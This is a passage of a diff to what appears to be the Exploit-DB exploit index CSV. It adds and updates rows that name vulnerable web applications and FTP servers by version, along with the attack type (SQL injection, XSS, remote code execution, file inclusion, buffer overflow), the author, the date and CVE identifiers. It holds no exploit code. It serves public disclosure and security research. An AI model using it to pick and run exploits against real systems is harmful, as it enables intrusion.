 8278,exploits/php/webapps/8278.txt,"Jinzora Media Jukebox 2.8 - 'name' Local File Inclusion",2009-03-24,dun,webapps,php,,2009-03-23,,1,OSVDB-52858;CVE-2009-2313,,,,,
 2836,exploits/php/webapps/2836.txt,"JiRos FAQ Manager 1.0 - 'index.asp' SQL Injection",2006-11-23,ajann,webapps,php,,2006-11-22,,1,OSVDB-30674;CVE-2006-6149,,,,,
 48361,exploits/php/webapps/48361.txt,"jizhi CMS 1.6.7 - Arbitrary File Download",2020-04-21,jizhicms,webapps,php,,2020-04-21,2020-04-21,0,,,,,,
 51647,exploits/php/webapps/51647.txt,"JLex GuestBook 1.6.4 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 30739,exploits/php/webapps/30739.txt,"JLMForo System - 'Buscado.php' Cross-Site Scripting",2007-11-05,"Jose Luis Gongora Fernandez",webapps,php,,2007-11-05,2014-01-06,1,CVE-2007-5954;OSVDB-39867,,,,,https://www.securityfocus.com/bid/26331/info
 6669,exploits/php/webapps/6669.txt,"JMweb - 'src' Local File Inclusion",2008-10-04,SirGod,webapps,php,,2008-10-03,2016-12-26,1,OSVDB-48805;CVE-2008-4522;OSVDB-48804,,,,,
 34806,exploits/php/webapps/34806.txt,"JNM Guestbook 3.0 - 'index.php' Cross-Site Scripting",2009-07-09,Moudi,webapps,php,,2009-07-09,2014-09-28,1,CVE-2009-2440;OSVDB-55725,,,,,https://www.securityfocus.com/bid/43697/info
@ -20498,6 +20505,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51629,exploits/php/webapps/51629.txt,"Joomla HikaShop 4.7.4 - Reflected XSS",2023-07-28,CraCkEr,webapps,php,,2023-07-28,2023-07-28,0,,,,,,
 51640,exploits/php/webapps/51640.txt,"Joomla iProperty Real Estate 4.1.1 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,,
 49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,,2021-03-08,2021-03-08,0,CVE-2018-17254,,,,,
 51645,exploits/php/webapps/51645.txt,"Joomla JLex Review 6.0.1 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 50927,exploits/php/webapps/50927.txt,"Joomla Plugin SexyPolling 2.1.7 - SQLi",2022-05-11,"Wolfgang Hotwagner",webapps,php,,2022-05-11,2022-05-11,0,,,,,,
 49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,,2020-11-17,2020-12-07,0,,,,,,
 51638,exploits/php/webapps/51638.txt,"Joomla Solidres 2.13.3 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,,
@ -24303,7 +24311,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2325,exploits/php/webapps/2325.txt,"News Evolution 3.0.3 - _NE[AbsPath] Remote File Inclusion",2006-09-07,ddoshomo,webapps,php,,2006-09-06,,1,OSVDB-30790;CVE-2006-4678;OSVDB-30789,,,,,
 26818,exploits/php/webapps/26818.txt,"News Module for Envolution - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,X1ngBox,webapps,php,,2005-12-14,2013-07-14,1,CVE-2005-4262;OSVDB-21751,,,,,https://www.securityfocus.com/bid/15857/info
 26819,exploits/php/webapps/26819.txt,"News Module for Envolution - 'modules.php' Multiple SQL Injections",2005-12-14,X1ngBox,webapps,php,,2005-12-14,2013-07-14,1,CVE-2005-4263;OSVDB-21752,,,,,https://www.securityfocus.com/bid/15857/info
-51587,exploits/php/webapps/51587.txt,"News Portal v4.0 - SQL Injection (Unauthorized)",2023-07-15,"Hubert Wojciechowski",webapps,php,,2023-07-15,2023-07-15,0,,,,,,
+51587,exploits/php/webapps/51587.txt,"News Portal v4.0 - SQL Injection (Unauthorized)",2023-07-15,"Hubert Wojciechowski",webapps,php,,2023-07-15,2023-08-04,1,,,,,,
 19180,exploits/php/webapps/19180.txt,"News Script PHP 1.2 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,webapps,php,,2012-06-16,2012-06-17,1,OSVDB-82995;OSVDB-82994;OSVDB-82993;OSVDB-82992,,,,,https://www.vulnerability-lab.com/get_content.php?id=600
 15843,exploits/php/webapps/15843.txt,"News Script PHP Pro - 'FCKeditor' Arbitrary File Upload",2010-12-29,Net.Edit0r,webapps,php,,2010-12-29,2010-12-29,0,,,,,,
 44030,exploits/php/webapps/44030.txt,"News Website Script 2.0.4 - 'search' SQL Injection",2018-02-13,"Varun Bagaria",webapps,php,,2018-02-13,2018-02-13,0,,,,,,
@ -26986,15 +26994,21 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 30911,exploits/php/webapps/30911.txt,"PHPJabbers Appointment Scheduler 2.0 - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102246;OSVDB-102163;OSVDB-102147;CVE-2014-10010;CVE-2014-10001,,,,,
 49281,exploits/php/webapps/49281.txt,"PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)",2020-12-17,"Andrea Intilangelo",webapps,php,,2020-12-17,2021-02-15,0,CVE-2020-35416,,,,,
 30912,exploits/php/webapps/30912.txt,"PHPJabbers Car Rental Script - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102162;OSVDB-102146,,,,,
 51651,exploits/php/webapps/51651.txt,"PHPJabbers Cleaning Business 1.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4115,,,,,
 30913,exploits/php/webapps/30913.txt,"PHPJabbers Event Booking Calendar 2.0 - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102161;OSVDB-102160;OSVDB-102145;CVE-2014-10015;CVE-2014-10014,,,,,
 30954,exploits/php/webapps/30954.txt,"PHPJabbers Hotel Booking System 3.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102223;OSVDB-102222;OSVDB-102219,,,,,
 30910,exploits/php/webapps/30910.txt,"PHPJabbers Job Listing Script - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102157;OSVDB-102148,,,,,
 51650,exploits/php/webapps/51650.txt,"PHPJabbers Night Club Booking 1.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4114,,,,,
 30950,exploits/php/webapps/30950.html,"PHPJabbers Pet Listing Script 1.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102241;OSVDB-102131,,,,,
 32441,exploits/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 - Cookie Authentication Bypass",2008-09-29,Crackers_Child,webapps,php,,2008-09-29,2014-03-23,1,,,,,,https://www.securityfocus.com/bid/31467/info
 30952,exploits/php/webapps/30952.html,"PHPJabbers Property Listing Script 2.0 - Cross-Site Request Forgery (Add Admin)",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102221,,,,,
 51653,exploits/php/webapps/51653.txt,"PHPJabbers Rental Property Booking 2.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4117,,,,,
 51649,exploits/php/webapps/51649.txt,"PHPJabbers Service Booking Script 1.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4113,,,,,
 51648,exploits/php/webapps/51648.txt,"PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4112,,,,,
 50475,exploits/php/webapps/50475.txt,"PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)",2021-11-03,Vulnerability-Lab,webapps,php,,2021-11-03,2021-11-03,0,,,,,,
 51416,exploits/php/webapps/51416.txt,"PHPJabbers Simple CMS 5.0 - SQL Injection",2023-05-02,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
 51415,exploits/php/webapps/51415.txt,"PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)",2023-05-02,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
 51652,exploits/php/webapps/51652.txt,"PHPJabbers Taxi Booking 2.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4116,,,,,
 30953,exploits/php/webapps/30953.txt,"PHPJabbers Vacation Packages Listing 2.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102178;OSVDB-102177;OSVDB-102176,,,,,
 30955,exploits/php/webapps/30955.txt,"PHPJabbers Vacation Rental Script 3.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102225;OSVDB-102224;OSVDB-102220,,,,,
 2775,exploits/php/webapps/2775.txt,"Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion",2006-11-13,Firewall,webapps,php,,2006-11-12,,1,OSVDB-30367;CVE-2006-5928;OSVDB-30366;OSVDB-30365;OSVDB-30364,,,,,
@ -32098,6 +32112,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17057,exploits/php/webapps/17057.txt,"webEdition CMS - Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2011-10-02,0,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,http://eidelweiss-advisories.blogspot.com/2011/03/webedition-cms-version-6102.html
 35516,exploits/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2014-12-10,1,,,,,,https://www.securityfocus.com/bid/47065/info
 17054,exploits/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",webapps,php,,2011-03-27,2011-03-29,1,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,
 51661,exploits/php/webapps/51661.txt,"Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 51662,exploits/php/webapps/51662.txt,"Webedition CMS v2.9.8.8 - Stored XSS",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 14132,exploits/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",webapps,php,,2010-06-30,2010-07-07,0,OSVDB-65930,,,,http://www.exploit-db.comwebERP_3.11.4.zip,
 35333,exploits/php/webapps/35333.py,"webERP 4.0.1 - 'InputSerialItemsFile.php' Arbitrary File Upload",2011-02-10,"AutoSec Tools",webapps,php,,2011-02-10,2014-11-23,1,,,,,,https://www.securityfocus.com/bid/46341/info
 19431,exploits/php/webapps/19431.txt,"webERP 4.08.1 - Local/Remote File Inclusion",2012-06-28,dun,webapps,php,,2012-06-28,2012-06-29,1,OSVDB-83414;OSVDB-83400,,,,,
@ -32291,6 +32307,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 33699,exploits/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",webapps,php,80,2014-06-09,2014-06-09,0,OSVDB-107773;OSVDB-107772;OSVDB-107771;OSVDB-107770;OSVDB-107769;OSVDB-107768;OSVDB-107767;OSVDB-107766;OSVDB-105981;OSVDB-105980;OSVDB-105979;OSVDB-105978;CVE-2014-4307;CVE-2014-4306,,,,,
 36821,exploits/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution",2015-04-23,"TUNISIAN CYBER",webapps,php,,2015-04-26,2015-04-26,1,OSVDB-121619,,,http://www.exploit-db.com/screenshots/idlt37000/webui.png,,
 39707,exploits/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",webapps,php,80,2016-04-18,2016-04-20,1,,,,http://www.exploit-db.com/screenshots/idlt40000/captura-de-pantalla-de-2016-04-20-192255.png,http://www.exploit-db.comwebutler_v3.2.zip,
 51660,exploits/php/webapps/51660.txt,"Webutler v3.2 - Remote Code Execution (RCE)",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-08-04,1,,,,,,
 31982,exploits/php/webapps/31982.txt,"Webuzo 2.1.3 - Multiple Vulnerabilities",2014-02-28,Mahendra,webapps,php,80,2014-02-28,2014-02-28,0,CVE-2013-6043;OSVDB-99204;CVE-2013-6042;CVE-2013-6041;OSVDB-99203;OSVDB-99202,,,,,
 45775,exploits/php/webapps/45775.txt,"WebVet 0.1a - 'id' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,80,2018-11-05,2018-11-05,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comwebvet_2013_07_08.zip,
 9193,exploits/php/webapps/9193.pl,"WebVision 2.1 - 'news.php?n' SQL Injection",2009-07-17,Mr.tro0oqy,webapps,php,,2009-07-16,,1,,,,,,
@ -32483,6 +32500,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50456,exploits/php/webapps/50456.js,"Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)",2021-10-25,samguy,webapps,php,,2021-10-25,2021-10-25,1,,,,,,
 49512,exploits/php/webapps/49512.py,"WordPress 5.0.0 - Image Remote Code Execution",2021-02-01,"OUSSAMA RAHALI",webapps,php,,2021-02-01,2021-02-01,0,CVE-2019-89242,,,,,
 50304,exploits/php/webapps/50304.sh,"WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)",2021-09-20,"David Utón",webapps,php,,2021-09-20,2021-09-20,0,CVE-2021-29447,,,,,
 51663,exploits/php/webapps/51663.txt,"WordPress adivaha Travel Plugin 2.3 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 51655,exploits/php/webapps/51655.txt,"WordPress adivaha Travel Plugin 2.3 - SQL Injection",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 9110,exploits/php/webapps/9110.txt,"WordPress Core / MU / Plugins - '/admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",webapps,php,,2009-07-09,2017-05-04,1,CVE-2009-2334;OSVDB-55712,,,,http://www.exploit-db.comWordPress-2.8.zip,http://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked
 23213,exploits/php/webapps/23213.txt,"WordPress Core 0.6/0.7 - 'Blog.header.php' SQL Injection",2003-10-03,"Seth Woolley",webapps,php,,2003-10-03,2012-12-08,1,OSVDB-4609,,,,,https://www.securityfocus.com/bid/8756/info
 30520,exploits/php/webapps/30520.txt,"WordPress Core 1.0.7 - 'Pool index.php' Cross-Site Scripting",2007-08-13,MustLive,webapps,php,,2007-08-13,2013-12-27,1,CVE-2007-4482;OSVDB-37299,,,,,https://www.securityfocus.com/bid/25413/info
@ -32896,6 +32915,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47335,exploits/php/webapps/47335.txt,"WordPress Plugin Event Tickets 4.10.7.1 - CSV Injection",2019-09-02,MTK,webapps,php,,2019-09-02,2019-09-02,0,,,,,http://www.exploit-db.comevent-tickets.4.10.7.1.zip,
 17794,exploits/php/webapps/17794.txt,"WordPress Plugin Eventify - Simple Events 1.7.f SQL Injection",2011-09-07,"Miroslav Stampar",webapps,php,,2011-09-07,2011-09-07,1,OSVDB-86245,"WordPress Plugin",,,http://www.exploit-db.comeventify.zip,
 49130,exploits/php/webapps/49130.py,"Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting",2020-12-01,B3KC4T,webapps,php,,2020-12-01,2020-12-01,0,CVE-2020-29395,,,,,
 51658,exploits/php/webapps/51658.txt,"Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access",2023-08-04,"Miguel Santareno",webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-2796,,,,,
 51659,exploits/php/webapps/51659.txt,"Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR",2023-08-04,"Miguel Santareno",webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-3219,,,,,
 10929,exploits/php/webapps/10929.txt,"WordPress Plugin Events - SQL Injection",2010-01-02,Red-D3v1L,webapps,php,,2010-01-01,,1,OSVDB-61478,"WordPress Plugin",,,http://www.exploit-db.comevents-calendar.6.6.zip,
 43479,exploits/php/webapps/43479.txt,"WordPress Plugin Events Calendar - 'event_id' SQL Injection",2018-01-10,"Dennis Veninga",webapps,php,,2018-01-10,2018-01-10,0,CVE-2018-5315,,,,,
 44785,exploits/php/webapps/44785.txt,"WordPress Plugin Events Calendar - SQL Injection",2018-05-28,AkkuS,webapps,php,,2018-05-28,2018-06-01,0,,,,,,
@ -32949,6 +32970,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46958,exploits/php/webapps/46958.txt,"WordPress Plugin Form Maker 1.13.3 - SQL Injection",2019-06-03,"Daniele Scanu",webapps,php,,2019-06-03,2019-06-03,0,CVE-2019-10866,,,,,
 48509,exploits/php/webapps/48509.txt,"WordPress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php,,2020-05-25,2020-05-25,0,,,,,,
 30002,exploits/php/webapps/30002.txt,"WordPress Plugin Formcraft - SQL Injection",2013-12-02,"Ashiyane Digital Security Team",webapps,php,,2013-12-10,2013-12-10,1,CVE-2013-7187;OSVDB-100877,"WordPress Plugin",,,,
 51664,exploits/php/webapps/51664.txt,"WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution",2023-08-04,"Mehmet Kelepçe",webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 17684,exploits/php/webapps/17684.txt,"WordPress Plugin Forum 1.7.8 - SQL Injection",2011-08-18,"Miroslav Stampar",webapps,php,,2011-08-18,2011-08-18,1,,"WordPress Plugin",,,http://www.exploit-db.comwpforum.1.7.8.zip,
 16235,exploits/php/webapps/16235.txt,"WordPress Plugin Forum Server 1.6.5 - SQL Injection",2011-02-24,"High-Tech Bridge SA",webapps,php,,2011-02-24,2011-02-24,0,CVE-2011-1047;OSVDB-70994;OSVDB-70993,"WordPress Plugin",,,http://www.exploit-db.comforum-server.zip,http://www.htbridge.ch/advisory/sql_injection_in_wp_forum_server_wordpre
 17828,exploits/php/webapps/17828.txt,"WordPress Plugin Forum Server 1.7 - SQL Injection",2011-09-13,"Miroslav Stampar",webapps,php,,2011-09-13,2011-09-13,1,OSVDB-75463;CVE-2012-6625,"WordPress Plugin",,,http://www.exploit-db.comforum-server.zip,
@ -33188,6 +33210,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39301,exploits/php/webapps/39301.html,"WordPress Plugin Ninja Forms 2.7.7 - Authentication Bypass",2014-09-08,Voxel@Night,webapps,php,,2014-09-08,2016-01-24,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/69740/info
 45234,exploits/php/webapps/45234.txt,"WordPress Plugin Ninja Forms 3.3.13 - CSV Injection",2018-08-21,"Mostafa Gharzi",webapps,php,,2018-08-21,2018-08-21,0,,,,,,
 45880,exploits/php/webapps/45880.txt,"WordPress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting",2018-11-15,MTK,webapps,php,80,2018-11-15,2018-11-20,0,CVE-2018-19287,"Cross-Site Scripting (XSS)",,,,
 51644,exploits/php/webapps/51644.py,"WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS",2023-08-04,"Mehran Seifalinia",webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-37979,,,,,
 50455,exploits/php/webapps/50455.txt,"WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS)",2021-10-25,"Akash Patil",webapps,php,,2021-10-25,2021-10-25,0,,,,,http://www.exploit-db.comninja-tables.4.1.7.zip,
 37353,exploits/php/webapps/37353.php,"WordPress Plugin Nmedia WordPress Member Conversation 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",webapps,php,,2015-06-05,2015-06-24,1,CVE-2012-3577;OSVDB-82792,"WordPress Plugin",,,,https://www.securityfocus.com/bid/53790/info
 28485,exploits/php/webapps/28485.txt,"WordPress Plugin NOSpamPTI - Blind SQL Injection",2013-09-23,"Alexandro Silva",webapps,php,,2013-09-23,2013-09-23,0,CVE-2013-5917;OSVDB-97528,"WordPress Plugin",,,http://www.exploit-db.comnospampti.zip,
@ -39044,6 +39067,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 36071,exploits/windows/dos/36071.py,"Xlight FTP Server 3.7 - Remote Buffer Overflow",2011-08-19,KedAns-Dz,dos,windows,,2011-08-19,2015-02-14,1,,,,,,https://www.securityfocus.com/bid/49255/info
 43135,exploits/windows/dos/43135.py,"Xlight FTP Server 3.8.8.5 - Buffer Overflow (PoC)",2017-11-07,bzyo,dos,windows,,2017-11-13,2017-11-13,1,,,,http://www.exploit-db.com/screenshots/idlt43500/screen-shot-2017-11-13-at-194303.png,http://www.exploit-db.comsetup.exe,
 46458,exploits/windows/dos/46458.py,"Xlight FTP Server 3.9.1 - Buffer Overflow (PoC)",2019-02-25,"Logan Whitmire",dos,windows,,2019-02-25,2019-02-25,0,,,,,http://www.exploit-db.comsetup-x64.exe,
 51665,exploits/windows/dos/51665.py,"Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)",2023-08-04,"Yehia Elghaly",dos,windows,,2023-08-04,2023-08-04,0,,,,,,
 10091,exploits/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",dos,windows,515,2009-10-05,,1,OSVDB-58727,,,,,
 10073,exploits/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,dos,windows,21,2009-10-01,2011-04-27,1,,,,,http://www.exploit-db.comxm_ftp_server_5.8.0.exe,
 10104,exploits/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service",2009-11-13,zhangmc,dos,windows,21,2009-11-12,,1,CVE-2009-4108;CVE-2009-4048;OSVDB-60494,,,,http://www.exploit-db.comxm_ftp_server_5.8.0.exe,